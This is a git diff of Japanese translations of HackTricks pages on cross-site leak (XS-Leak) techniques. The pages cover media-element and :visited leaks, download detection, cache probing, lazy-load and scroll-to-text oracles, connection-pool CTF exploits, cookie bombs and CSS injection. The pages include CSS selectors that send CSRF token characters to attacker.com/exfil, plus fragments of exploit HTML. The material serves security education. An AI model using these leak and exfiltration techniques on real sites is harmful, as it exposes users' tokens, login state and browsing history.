+HTML要素を通じた情報漏洩は、特にユーザー情報に基づいて動的メディアファイルが生成される場合や、メディアサイズを変更する透かしが追加される場合に、ウェブセキュリティの懸念事項です。攻撃者は、特定のHTML要素によって露出された情報を分析することで、可能な状態を区別するためにこれを悪用することができます。
 
-### HTML要素によって露出される情報
+### HTML要素によって露出された情報
 
 - **HTMLMediaElement**: この要素はメディアの `duration` と `buffered` 時間を明らかにし、APIを介してアクセスできます。[HTMLMediaElementについての詳細](https://developer.mozilla.org/en-US/docs/Web/API/HTMLMediaElement)
-- **HTMLVideoElement**: `videoHeight` と `videoWidth` を公開します。一部のブラウザでは、`webkitVideoDecodedByteCount`、`webkitAudioDecodedByteCount`、および `webkitDecodedFrameCount` などの追加プロパティが利用可能で、メディアコンテンツに関するより詳細な情報を提供します。[HTMLVideoElementについての詳細](https://developer.mozilla.org/en-US/docs/Web/API/HTMLVideoElement)
+- **HTMLVideoElement**: `videoHeight` と `videoWidth` を露出します。一部のブラウザでは、`webkitVideoDecodedByteCount`、`webkitAudioDecodedByteCount`、および `webkitDecodedFrameCount` などの追加プロパティが利用可能で、メディアコンテンツに関するより詳細な情報を提供します。[HTMLVideoElementについての詳細](https://developer.mozilla.org/en-US/docs/Web/API/HTMLVideoElement)
 - **getVideoPlaybackQuality()**: この関数は、`totalVideoFrames` を含むビデオ再生品質に関する詳細を提供し、処理されたビデオデータの量を示すことができます。[getVideoPlaybackQuality()についての詳細](https://developer.mozilla.org/en-US/docs/Web/API/VideoPlaybackQuality)
 - **HTMLImageElement**: この要素は画像の `height` と `width` を漏洩します。ただし、画像が無効な場合、これらのプロパティは0を返し、`image.decode()` 関数は拒否され、画像が正しく読み込まれなかったことを示します。[HTMLImageElementについての詳細](https://developer.mozilla.org/en-US/docs/Web/API/HTMLImageElement)
 
@@ -711,13 +710,13 @@ HTML要素を通じた情報漏洩は、特にユーザー情報に基づいて
 - **コード例**: [http://blog.bawolff.net/2021/10/write-up-pbctf-2021-vault.html](http://blog.bawolff.net/2021/10/write-up-pbctf-2021-vault.html)
 
 > [!NOTE]
-> [**これ**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/)によると、これはヘッドレスChromeでは機能しません。
+> [**これによると**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/)、これはヘッドレスChromeでは機能しません。
 
 CSS `:visited` セレクタは、ユーザーが以前に訪問した場合にURLを異なるスタイルで装飾するために使用されます。過去には、`getComputedStyle()` メソッドを使用してこれらのスタイルの違いを特定することができました。しかし、現代のブラウザは、このメソッドがリンクの状態を明らかにするのを防ぐためのセキュリティ対策を実施しています。これらの対策には、リンクが訪問されたかのように常に計算されたスタイルを返し、`:visited` セレクタで適用できるスタイルを制限することが含まれます。
 
-これらの制限にもかかわらず、リンクの訪問状態を間接的に見分けることは可能です。1つの技術は、ユーザーをCSSに影響を与える領域に対話させることを含み、特に `mix-blend-mode` プロパティを利用します。このプロパティは、要素とその背景をブレンドすることを可能にし、ユーザーの対話に基づいて訪問状態を明らかにする可能性があります。
+これらの制限にもかかわらず、リンクの訪問状態を間接的に見分けることは可能です。1つの技術は、ユーザーをCSSに影響を与える領域に対して操作させることを含み、特に `mix-blend-mode` プロパティを利用します。このプロパティは、要素とその背景をブレンドすることを可能にし、ユーザーの操作に基づいて訪問状態を明らかにする可能性があります。
 
-さらに、リンクのレンダリングタイミングを悪用することで、ユーザーの対話なしに検出を行うことができます。ブラウザは、訪問済みリンクと未訪問リンクを異なる方法でレンダリングする可能性があるため、レンダリングにおける測定可能な時間の違いを生じさせることがあります。概念実証（PoC）は、Chromiumのバグ報告で言及されており、複数のリンクを使用してタイミングの違いを増幅させ、訪問状態をタイミング分析を通じて検出可能にするこの技術を示しています。
+さらに、リンクのレンダリングタイミングを悪用することで、ユーザーの操作なしに検出を行うことができます。ブラウザは、訪問済みリンクと未訪問リンクを異なる方法でレンダリングする可能性があるため、レンダリングにおける測定可能な時間の違いを生じさせることがあります。ある概念実証（PoC）がChromiumのバグ報告で言及されており、この技術を使用して複数のリンクを利用してタイミングの違いを増幅し、訪問状態をタイミング分析を通じて検出可能にすることを示しています。
 
 これらのプロパティとメソッドの詳細については、ドキュメントページを訪れてください：
 
@@ -730,46 +729,46 @@ CSS `:visited` セレクタは、ユーザーが以前に訪問した場合にUR
 - **インクルージョンメソッド**: フレーム
 - **検出可能な違い**: ヘッダー
 - **詳細情報**: [https://www.ndss-symposium.org/wp-content/uploads/2020/02/24278-paper.pdf](https://www.ndss-symposium.org/wp-content/uploads/2020/02/24278-paper.pdf)
-- **概要:** Google Chrome では、X-Frame-Options 制限によりクロスオリジンサイトに埋め込まれたページがブロックされると、専用のエラーページが表示されます。
+- **概要:** Google Chromeでは、X-Frame-Options制限によりクロスオリジンサイトに埋め込まれることがブロックされた場合、専用のエラーページが表示されます。
 - **コード例**: [https://xsinator.com/testing.html#ContentDocument%20X-Frame%20Leak](https://xsinator.com/testing.html#ContentDocument%20X-Frame%20Leak)
 
-Chrome では、`X-Frame-Options` ヘッダーが "deny" または "same-origin" に設定されたページがオブジェクトとして埋め込まれると、エラーページが表示されます。Chrome は、このオブジェクトの `contentDocument` プロパティに対して空のドキュメントオブジェクト（`null` ではなく）を一意に返します。これは、iframe や他のブラウザとは異なります。攻撃者は、空のドキュメントを検出することでこれを悪用し、特に開発者が X-Frame-Options ヘッダーを不一致に設定し、エラーページを見落とすことが多い場合に、ユーザーの状態に関する情報を明らかにする可能性があります。意識とセキュリティヘッダーの一貫した適用が、こうした漏洩を防ぐために重要です。
+Chromeでは、`X-Frame-Options` ヘッダーが "deny" または "same-origin" に設定されたページがオブジェクトとして埋め込まれると、エラーページが表示されます。Chromeは、このオブジェクトの `contentDocument` プロパティに対して空のドキュメントオブジェクト（`null` の代わりに）を一意に返します。これは、iframeや他のブラウザとは異なります。攻撃者は、空のドキュメントを検出することでこれを悪用し、特に開発者がX-Frame-Optionsヘッダーを不一致に設定し、エラーページを見落とすことが多い場合に、ユーザーの状態に関する情報を明らかにする可能性があります。意識とセキュリティヘッダーの一貫した適用が、こうした漏洩を防ぐために重要です。
 
 ### ダウンロード検出
 
 - **インクルージョンメソッド**: フレーム、ポップアップ
 - **検出可能な違い**: ヘッダー
 - **詳細情報**: [https://xsleaks.dev/docs/attacks/navigations/#download-trigger](https://xsleaks.dev/docs/attacks/navigations/#download-trigger)
-- **概要:** 攻撃者は、iframe を利用してファイルのダウンロードを識別できます。iframe の継続的なアクセス可能性は、ファイルのダウンロードが成功したことを示唆します。
+- **概要:** 攻撃者は、iframeを利用してファイルのダウンロードを識別できます。iframeの継続的なアクセス可能性は、ファイルのダウンロードが成功したことを示唆します。
 - **コード例**: [https://xsleaks.dev/docs/attacks/navigations/#download-bar](https://xsleaks.dev/docs/attacks/navigations/#download-bar)
 
-`Content-Disposition` ヘッダー、特に `Content-Disposition: attachment` は、ブラウザにコンテンツをインラインで表示するのではなく、ダウンロードするよう指示します。この動作は、ユーザーがファイルダウンロードをトリガーするページにアクセスできるかどうかを検出するために悪用される可能性があります。Chromium ベースのブラウザでは、このダウンロード動作を検出するためのいくつかの技術があります：
+`Content-Disposition` ヘッダー、特に `Content-Disposition: attachment` は、ブラウザにコンテンツをインラインで表示するのではなく、ダウンロードするよう指示します。この動作は、ユーザーがファイルダウンロードをトリガーするページにアクセスできるかどうかを検出するために悪用される可能性があります。Chromiumベースのブラウザでは、このダウンロード動作を検出するためのいくつかの技術があります：
 
 1. **ダウンロードバーの監視**:
-- Chromium ベースのブラウザでファイルがダウンロードされると、ブラウザウィンドウの下部にダウンロードバーが表示されます。
+- Chromiumベースのブラウザでファイルがダウンロードされると、ブラウザウィンドウの下部にダウンロードバーが表示されます。
 - ウィンドウの高さの変化を監視することで、攻撃者はダウンロードバーの出現を推測し、ダウンロードが開始されたことを示唆できます。
 2. **iframeを使用したダウンロードナビゲーション**:
 - ページが `Content-Disposition: attachment` ヘッダーを使用してファイルダウンロードをトリガーすると、ナビゲーションイベントは発生しません。
 - コンテンツをiframeに読み込み、ナビゲーションイベントを監視することで、コンテンツの配置がファイルダウンロードを引き起こすかどうか（ナビゲーションなし）を確認できます。
 3. **iframeなしのダウンロードナビゲーション**:
 - iframe技術と同様に、この方法はiframeの代わりに `window.open` を使用します。
-- 新しく開かれたウィンドウでナビゲーションイベントを監視することで、ファイルダウンロードがトリガーされたかどうか（ナビゲーションなし）を明らかにすることができます。
+- 新しく開かれたウィンドウでナビゲーションイベントを監視することで、ファイルダウンロードがトリガーされたかどうか（ナビゲーションなし）や、コンテンツがインラインで表示されているか（ナビゲーションが発生）を明らかにできます。
 
-ログインユーザーのみがそのようなダウンロードをトリガーできるシナリオでは、これらの技術を使用して、ダウンロードリクエストに対するブラウザの応答に基づいてユーザーの認証状態を間接的に推測することができます。
+ログインユーザーのみがそのようなダウンロードをトリガーできるシナリオでは、これらの技術を使用して、ブラウザのダウンロードリクエストに対する応答に基づいてユーザーの認証状態を間接的に推測することができます。
 
-### パーティション化されたHTTPキャッシュバイパス <a href="#partitioned-http-cache-bypass" id="partitioned-http-cache-bypass"></a>
+### パーティショニングされたHTTPキャッシュバイパス <a href="#partitioned-http-cache-bypass" id="partitioned-http-cache-bypass"></a>
 
 - **インクルージョンメソッド**: ポップアップ
 - **検出可能な違い**: タイミング
 - **詳細情報**: [https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass](https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass)
-- **概要:** 攻撃者は、iframe を利用してファイルのダウンロードを識別できます。iframe の継続的なアクセス可能性は、ファイルのダウンロードが成功したことを示唆します。
+- **概要:** 攻撃者は、iframeを利用してファイルのダウンロードを識別できます。iframeの継続的なアクセス可能性は、ファイルのダウンロードが成功したことを示唆します。
 - **コード例**: [https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass](https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass), [https://gist.github.com/aszx87410/e369f595edbd0f25ada61a8eb6325722](https://gist.github.com/aszx87410/e369f595edbd0f25ada61a8eb6325722) (from [https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/))
 
 > [!WARNING]
-> この技術が興味深い理由は、Chrome が現在 **キャッシュパーティショニング**を持っており、新しく開かれたページのキャッシュキーは `(https://actf.co, https://actf.co, https://sustenance.web.actf.co/?m=xxx)` ですが、ngrokページを開いてfetchを使用すると、キャッシュキーは `(https://myip.ngrok.io, https://myip.ngrok.io, https://sustenance.web.actf.co/?m=xxx)` になります。**キャッシュキーが異なる**ため、キャッシュは共有できません。詳細はここで確認できます: [キャッシュのパーティショニングによるセキュリティとプライバシーの向上](https://developer.chrome.com/blog/http-cache-partitioning/)\
-> （[**ここ**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/)からのコメント）
+> この技術が興味深い理由は、Chromeが現在**キャッシュパーティショニング**を持っており、新しく開かれたページのキャッシュキーは `(https://actf.co, https://actf.co, https://sustenance.web.actf.co/?m=xxx)` ですが、ngrokページを開いてfetchを使用すると、キャッシュキーは `(https://myip.ngrok.io, https://myip.ngrok.io, https://sustenance.web.actf.co/?m=xxx)` になります。**キャッシュキーが異なる**ため、キャッシュは共有できません。詳細はここで確認できます: [キャッシュのパーティショニングによるセキュリティとプライバシーの向上](https://developer.chrome.com/blog/http-cache-partitioning/)\
+> （[**こちらからのコメント**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/)）
 
-サイト `example.com` が `*.example.com/resource` からリソースを含む場合、そのリソースは、リソースがトップレベルナビゲーションを介して直接要求された場合と**同じキャッシングキー**を持ちます。これは、キャッシングキーがトップレベル _eTLD+1_ とフレーム _eTLD+1_ で構成されているためです。
+サイト `example.com` が `*.example.com/resource` からリソースを含む場合、そのリソースは、リソースがトップレベルナビゲーションを介して直接要求された場合と**同じキャッシュキー**を持ちます。これは、キャッシュキーがトップレベル _eTLD+1_ とフレーム _eTLD+1_ で構成されているためです。
 
 キャッシュにアクセスする方がリソースを読み込むよりも速いため、ページの位置を変更し、20ms（例えば）後にそれをキャンセルすることが可能です。停止後にオリジンが変更された場合、それはリソースがキャッシュされていたことを意味します。\
 または、**潜在的にキャッシュされたページにいくつかのfetchを送信し、かかる時間を測定することもできます**。
@@ -779,7 +778,7 @@ Chrome では、`X-Frame-Options` ヘッダーが "deny" または "same-origin"
 - **インクルージョンメソッド**: Fetch API
 - **検出可能な違い**: リダイレクト
 - **詳細情報**: [ttps://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.gae7bf0b4f7_0_1234](https://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.gae7bf0b4f7_0_1234)
-- **概要:** fetchリクエストへの応答がリダイレクトであるかどうかを確認できます。
+- **概要:** fetchリクエストに対する応答がリダイレクトであるかどうかを確認できます。
 - **コード例**:
 
 ![](<../../images/image (769).png>)
@@ -789,10 +788,10 @@ Chrome では、`X-Frame-Options` ヘッダーが "deny" または "same-origin"
 - **インクルージョンメソッド**: Fetch API
 - **検出可能な違い**: タイミング
 - **詳細情報**: [https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller](https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller)
-- **概要:** リソースを読み込もうとし、読み込まれる前に中断します。エラーが発生するかどうかに応じて、リソースがキャッシュされていたかどうかがわかります。
+- **概要:** リソースを読み込もうとし、読み込まれる前に中断されることがあります。エラーが発生するかどうかに応じて、リソースがキャッシュされているかどうかがわかります。
 - **コード例**: [https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller](https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller)
 
-_**fetch**_ と _**setTimeout**_ を使用して **AbortController** で **リソースがキャッシュされているかどうかを検出**し、特定のリソースをブラウザキャッシュから排除します。さらに、このプロセスは新しいコンテンツをキャッシュすることなく行われます。
+_**fetch**_ と _**setTimeout**_ を使用して **AbortController** で、**リソースがキャッシュされているかどうかを検出し**、特定のリソースをブラウザキャッシュから排除します。さらに、このプロセスは新しいコンテンツをキャッシュすることなく行われます。
 
 ### スクリプト汚染
 
@@ -810,12 +809,12 @@ _**fetch**_ と _**setTimeout**_ を使用して **AbortController** で **リ
 - **概要:** サービスワーカーを使用してウェブの実行時間を測定します。
 - **コード例**:
 
-与えられたシナリオでは、攻撃者は自分のドメインの1つ、具体的には "attacker.com" 内で **サービスワーカー** を登録することから始めます。次に、攻撃者はメインドキュメントからターゲットウェブサイトに新しいウィンドウを開き、**サービスワーカー** にタイマーを開始するよう指示します。新しいウィンドウが読み込みを開始すると、攻撃者は前のステップで取得した参照を **サービスワーカー** によって管理されているページにナビゲートします。
+与えられたシナリオでは、攻撃者は自分のドメインの1つ、具体的には "attacker.com" に **サービスワーカー**を登録することから始めます。次に、攻撃者はメインドキュメントからターゲットウェブサイトに新しいウィンドウを開き、**サービスワーカー**にタイマーを開始するよう指示します。新しいウィンドウが読み込まれ始めると、攻撃者は前のステップで取得した参照を**サービスワーカー**によって管理されているページにナビゲートします。
 
-前のステップで開始されたリクエストが到着すると、**サービスワーカー** は **204 (No Content)** ステータスコードで応答し、ナビゲーションプロセスを効果的に終了します。この時点で、**サービスワーカー** は前のステップで開始されたタイマーからの測定値をキャプチャします。この測定値は、ナビゲーションプロセスの遅延を引き起こすJavaScriptの期間によって影響を受けます。
+前のステップで開始されたリクエストが到着すると、**サービスワーカー**は **204 (No Content)** ステータスコードで応答し、ナビゲーションプロセスを効果的に終了します。この時点で、**サービスワーカー**は前のステップで開始されたタイマーからの測定値をキャプチャします。この測定値は、ナビゲーションプロセスの遅延を引き起こすJavaScriptの期間によって影響を受けます。
 
 > [!WARNING]
-> 実行タイミングでは、**ネットワーク要因を排除**して**より正確な測定値を取得**することが可能です。たとえば、ページを読み込む前に使用されるリソースを読み込むことによってです。
+> 実行タイミングでは、**ネットワーク要因を排除**して**より正確な測定値を取得**することが可能です。たとえば、ページを読み込む前にページで使用されるリソースを読み込むことによってです。
 
 ### Fetchタイミング
 
@@ -838,7 +837,7 @@ _**fetch**_ と _**setTimeout**_ を使用して **AbortController** で **リ
 
 ここでは、クロスオリジンHTMLから情報を抽出するための技術を見つけることができます。**HTMLコンテンツを注入する**ことができる場合に興味深い技術です。これらの技術は、何らかの理由で**HTMLを注入できるが、JSコードを注入できない**場合に興味深いです。
 
-### ダングリングマークアップ
+### ダンギングマークアップ
 
 {{#ref}}
 ../dangling-markup-html-scriptless-injection/
@@ -846,17 +845,17 @@ _**fetch**_ と _**setTimeout**_ を使用して **AbortController** で **リ
 
 ### 画像の遅延読み込み
 
-**コンテンツを抽出する**必要があり、**秘密の前にHTMLを追加できる**場合は、**一般的なダングリングマークアップ技術**を確認する必要があります。\
-ただし、何らかの理由で**文字ごとに**行う必要がある場合（キャッシュヒットを介して通信している可能性があります）、このトリックを使用できます。
+**コンテンツを抽出する**必要があり、**秘密の前にHTMLを追加できる**場合は、**一般的なダンギングマークアップ技術**を確認する必要があります。\
+ただし、何らかの理由で**文字ごとに**行う必要がある場合（キャッシュヒットを介して通信する場合など）、このトリックを使用できます。
 
-HTMLの**画像**には、値が**lazy**である "**loading**" 属性があります。この場合、画像はページが読み込まれるときではなく、表示されたときに読み込まれます。
+HTMLの**画像**には、値が**lazy**である "**loading**" 属性があります。この場合、画像はページが読み込まれている間ではなく、表示されたときに読み込まれます。
 ```html
 <img src=/something loading=lazy >
 ```
 したがって、あなたができることは、**多くのジャンク文字**（例えば、**何千もの"W"**）を**秘密の前にウェブページを埋めるために追加することです**、または**次のようなものを追加することです** `<br><canvas height="1850px"></canvas><br>`。\
 例えば、私たちの**インジェクションがフラグの前に現れる場合**、**画像**は**読み込まれます**が、**フラグの後に現れる場合**、フラグ + ジャンクは**読み込まれるのを防ぎます**（どれだけのジャンクを置くかは調整が必要です）。これは[**この書き込み**](https://blog.huli.tw/2022/10/08/en/sekaictf2022-safelist-and-connection/)で起こったことです。
 
-別のオプションは、**scroll-to-text-fragment**を使用することです（許可されている場合）：
+もう一つのオプションは、**許可されている場合はscroll-to-text-fragmentを使用することです**：
 
 #### Scroll-to-text-fragment
 
@@ -868,11 +867,11 @@ HTMLの**画像**には、値が**lazy**である "**loading**" 属性があり
 
 ここで、post.html には攻撃者のジャンク文字と遅延読み込み画像が含まれ、その後にボットの秘密が追加されます。
 
-このテキストが行うことは、ボットがページ内の `SECR` というテキストを含む任意のテキストにアクセスすることです。そのテキストが秘密であり、**画像のすぐ下にあるため**、**推測された秘密が正しい場合にのみ画像が読み込まれます**。これにより、**秘密を文字ごとに抽出するためのオラクルが得られます**。
+このテキストが行うのは、ボットがページ内の `SECR` というテキストを含む任意のテキストにアクセスすることです。そのテキストは秘密であり、**画像のすぐ下にあるため**、**推測された秘密が正しい場合にのみ画像が読み込まれます**。これにより、**秘密を文字ごとに抽出するためのオラクルが得られます**。
 
-これを悪用するためのコード例: [https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e](https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e)
+これを利用するためのコード例: [https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e](https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e)
 
-### 画像の遅延読み込みに基づく時間
+### 画像の遅延読み込み時間ベース
 
 **外部画像を読み込むことができない場合**、攻撃者に画像が読み込まれたことを示す別のオプションは、**文字を何度も推測してそれを測定することです**。画像が読み込まれると、すべてのリクエストは画像が読み込まれない場合よりも長くかかります。これは、[**この書き込みの解決策**](https://blog.huli.tw/2022/10/08/en/sekaictf2022-safelist-and-connection/) **において使用されたものです**。
 
diff --git a/src/pentesting-web/xs-search/connection-pool-by-destination-example.md b/src/pentesting-web/xs-search/connection-pool-by-destination-example.md
index de501c800..62ce40856 100644
--- a/src/pentesting-web/xs-search/connection-pool-by-destination-example.md
+++ b/src/pentesting-web/xs-search/connection-pool-by-destination-example.md
@@ -2,7 +2,7 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-In [**このエクスプロイト**](https://gist.github.com/terjanq/0bc49a8ef52b0e896fca1ceb6ca6b00e#file-safelist-html), [**@terjanq**](https://twitter.com/terjanq) は、以下のページで言及された課題に対する別の解決策を提案しています：
+In [**this exploit**](https://gist.github.com/terjanq/0bc49a8ef52b0e896fca1ceb6ca6b00e#file-safelist-html), [**@terjanq**](https://twitter.com/terjanq) は、次のページで言及された課題に対する別の解決策を提案しています：
 
 {{#ref}}
 connection-pool-by-destination-example.md
@@ -10,13 +10,13 @@ connection-pool-by-destination-example.md
 
 このエクスプロイトがどのように機能するか見てみましょう：
 
-- 攻撃者は、できるだけ多くの **`<img`** タグを **読み込む** **`/js/purify.js`** というノートを注入します（オリジンをブロックするために6つ以上）。
+- 攻撃者は、できるだけ多くの **`<img`** タグ **を読み込む** **`/js/purify.js`** を注入します（オリジンをブロックするために6つ以上）。
 - 次に、攻撃者はインデックス1の **ノート** を **削除** します。
-- その後、攻撃者は \[残りのノートで **ボットがページにアクセスする**\] ようにし、**`victim.com/js/purify.js`** に **リクエスト** を送信し、その **時間** を **計測** します。&#x20;
-- 時間が **大きければ**、**注入** は残された **ノート** にあり、時間が **短ければ**、**フラグ** はそこにありました。
+- 次に、攻撃者は \[残りのノートで **ボットがページにアクセスする**\] ようにし、**`victim.com/js/purify.js`** に **リクエスト** を送信し、その **時間** を **計測** します。&#x20;
+- 時間が **大きければ**、**注入** は残された **ノート** にあり、時間が **小さければ**、**フラグ** はそこにありました。
 
 > [!NOTE]
-> 正直なところ、スクリプトを読んでいると、**攻撃者がボットにページを読み込ませて img タグをトリガーさせる** 部分を見逃しました。コードにはそのようなものは見当たりません。
+> 正直なところ、スクリプトを読んでいると、**攻撃者がボットにページを読み込ませて img タグをトリガーさせる** 部分が抜けているように思います。コードの中にそのようなものは見当たりません。
 ```html
 <html>
 <head>
diff --git a/src/pentesting-web/xs-search/connection-pool-example.md b/src/pentesting-web/xs-search/connection-pool-example.md
index 05f56df12..239846f47 100644
--- a/src/pentesting-web/xs-search/connection-pool-example.md
+++ b/src/pentesting-web/xs-search/connection-pool-example.md
@@ -6,25 +6,25 @@
 
 In the [**Sekaictf2022 - safelist**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/safelist/solution) challenge, [**@Strellic\_**](https://twitter.com/Strellic_) gives an example of how to use a **variation** of the **Connection Pool** technique to perform a **XS-Leak**.
 
-このチャレンジでは、攻撃者が持っている資産は次のとおりです：
+このチャレンジでは、攻撃者が持っている資産は以下の通りです：
 
 - **ボット**は攻撃者が指定した**URL**を**訪問**します。
-- 攻撃者はページに**HTML**を**注入**できます（ただしJSは使用できず、dompurifyが使用されています）し、**CSRF**を悪用して**ボットがそのHTMLで**投稿を作成させます。
-- 攻撃者はCSRFを悪用して**ボット**に**最初の**投稿を**削除**させることができます。
-- **投稿**は**アルファベット順**に並べられているため、**最初の投稿が削除される**と、攻撃者の**HTML**コンテンツが**読み込まれた**場合、それは**フラグの前にアルファベット順にあった**ことを意味します。
+- 攻撃者はページに**HTML**を**注入**できます（ただしJSは不可、dompurifyが使用されています）し、**CSRF**を悪用して**ボットがそのHTMLで**ポストを作成**させます。
+- 攻撃者はCSRFを悪用して**ボット**に**最初の**ポストを**削除**させることができます。
+- **ポスト**は**アルファベット順**に並べられているため、**最初のポストが削除**されると、攻撃者の**HTML**コンテンツが**読み込まれた**場合、それは**フラグの前にアルファベット順にあった**ことを意味します。
 
-したがって、フラグを盗むために、@Strellyc\_が提案する解決策は、**テストする各文字ごとに**ボットに次のことをさせることです：
+したがって、フラグを盗むために、@Strellyc\_が提案する解決策は、**テストする各文字ごとに**ボットに以下を行わせることです：
 
-- **フラグの既知の部分**で始まる**新しい投稿**を作成し、いくつかの**img**を**読み込む**。
-- **位置0**の**投稿**を**削除**する。
+- **フラグの既知の部分**で始まる**新しいポスト**を作成し、いくつかの**img**を**読み込む**。
+- **位置0**の**ポストを削除**する。
 - 255のソケットをブロックする。
-- 投稿を含むページを読み込む。
+- ポストを含むページを読み込む。
 - サイトに対して5つのランダムリクエストを行い（この場合はexample.com）、その所要時間を測定する。
 
 > [!WARNING]
-> **削除された**投稿が**フラグ**であった場合、これはすべての**画像**が**5つのランダムリクエスト**と**ブロックされていない**ソケットを**争う**ことを意味します。つまり、測定された時間は他のシナリオよりも大きくなります。
+> **削除された**ポストが**フラグ**であった場合、これはすべての**画像**が**5つのランダムリクエスト**と**ブロックされていない**ソケットを**争う**ことを意味します。つまり、測定された時間は他のシナリオよりも大きくなります。
 >
-> **削除された**投稿が**HTML**であった場合、**5つのランダムリクエスト**は**速く**なります。なぜなら、それらは注入されたHTMLとそのソケットを争う必要がないからです。
+> **削除された**ポストが**HTML**であった場合、**5つのランダムリクエスト**は**速く**なります。なぜなら、注入されたHTMLとそのソケットを争う必要がないからです。
 
 ### エクスプロイト 1
 
diff --git a/src/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md b/src/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md
index da90c657e..29f7d6f57 100644
--- a/src/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md
+++ b/src/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md
@@ -2,7 +2,7 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-以下の**スクリプト**は[**こちら**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/)から取得したもので、ユーザーが**任意の量のクッキーを挿入**できる機能を悪用し、真のレスポンスが偽のレスポンスよりも大きくなることを知ってファイルをスクリプトとして読み込んでいます。そして、成功した場合、レスポンスはリダイレクトで、結果として得られるURLが長くなり、**サーバーが処理できないほど大きくなり、エラーのHTTPステータスコードを返します**。検索が失敗した場合、URLが短いため、何も起こりません。
+以下の**スクリプト**は[**こちら**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/)から取得したもので、ユーザーが**任意の量のクッキーを挿入**できる機能を悪用し、真のレスポンスが偽のものよりも大きくなることを知ってファイルをスクリプトとして読み込むものです。成功した場合、レスポンスはリダイレクトで、結果として得られるURLは長くなり、**サーバーが処理できないほど大きくなり、エラーのHTTPステータスコードを返します**。検索が失敗した場合、URLが短いため、何も起こりません。
 ```html
 <>'";
 <form action="https://sustenance.web.actf.co/s" method="POST">
diff --git a/src/pentesting-web/xs-search/css-injection/README.md b/src/pentesting-web/xs-search/css-injection/README.md
index d79eff17f..fdb791237 100644
--- a/src/pentesting-web/xs-search/css-injection/README.md
+++ b/src/pentesting-web/xs-search/css-injection/README.md
@@ -1,8 +1,8 @@
-# CSSインジェクション
+# CSS Injection
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## CSSインジェクション
+## CSS Injection
 
 ### 属性セレクタ
 
@@ -19,29 +19,29 @@ input[name="csrf"][value^="9"] {
 background-image: url(https://attacker.com/exfil/9);
 }
 ```
-しかし、このアプローチは、隠し入力要素（`type="hidden"`）を扱う際に制限に直面します。なぜなら、隠し要素は背景を読み込まないからです。
+しかし、このアプローチは、隠し入力要素（`type="hidden"`）を扱う際に制限に直面します。隠し要素は背景を読み込まないためです。
 
 #### 隠し要素のバイパス
 
-この制限を回避するために、`~` 一般的な兄弟コンビネータを使用して、次の兄弟要素をターゲットにすることができます。CSSルールは、隠し入力要素の後に続くすべての兄弟に適用され、背景画像が読み込まれる原因となります。
+この制限を回避するために、`~` 一般的な兄弟コンビネータを使用して、次の兄弟要素をターゲットにすることができます。CSSルールは、隠し入力要素の後に続くすべての兄弟に適用され、背景画像が読み込まれるようになります。
 ```css
 input[name="csrf"][value^="csrF"] ~ * {
 background-image: url(https://attacker.com/exfil/csrF);
 }
 ```
-この技術を利用した実践的な例は、提供されたコードスニペットに詳述されています。こちらで見ることができます [here](https://gist.github.com/d0nutptr/928301bde1d2aa761d1632628ee8f24e)。
+この技術を悪用する実用的な例は、提供されたコードスニペットに詳述されています。こちらで見ることができます [here](https://gist.github.com/d0nutptr/928301bde1d2aa761d1632628ee8f24e)。
 
 #### CSSインジェクションの前提条件
 
 CSSインジェクション技術が効果的であるためには、特定の条件を満たす必要があります：
 
 1. **ペイロードの長さ**: CSSインジェクションベクターは、作成されたセレクタを収容するのに十分な長さのペイロードをサポートする必要があります。
-2. **CSSの再評価**: ページをフレーム化する能力が必要であり、これは新しく生成されたペイロードでCSSの再評価をトリガーするために必要です。
-3. **外部リソース**: この技術は、外部ホストされた画像を使用する能力を前提としています。これは、サイトのコンテンツセキュリティポリシー（CSP）によって制限される場合があります。
+2. **CSSの再評価**: 新しく生成されたペイロードでCSSの再評価をトリガーするために、ページをフレーム化する能力が必要です。
+3. **外部リソース**: この技術は、外部ホストされた画像を使用する能力を前提としています。これは、サイトのコンテンツセキュリティポリシー（CSP）によって制限される可能性があります。
 
 ### ブラインド属性セレクタ
 
-[**この投稿で説明されているように**](https://portswigger.net/research/blind-css-exfiltration)、**`:has`** と **`:not`** セレクタを組み合わせて、ブラインド要素からでもコンテンツを特定することが可能です。これは、CSSインジェクションを読み込むウェブページの中身が全く分からない場合に非常に便利です。\
+[**この投稿で説明されているように**](https://portswigger.net/research/blind-css-exfiltration)、**`:has`** と **`:not`** のセレクタを組み合わせて、ブラインド要素からでもコンテンツを特定することが可能です。これは、CSSインジェクションを読み込むウェブページの中身が全くわからない場合に非常に便利です。\
 また、これらのセレクタを使用して、同じタイプの複数のブロックから情報を抽出することも可能です。
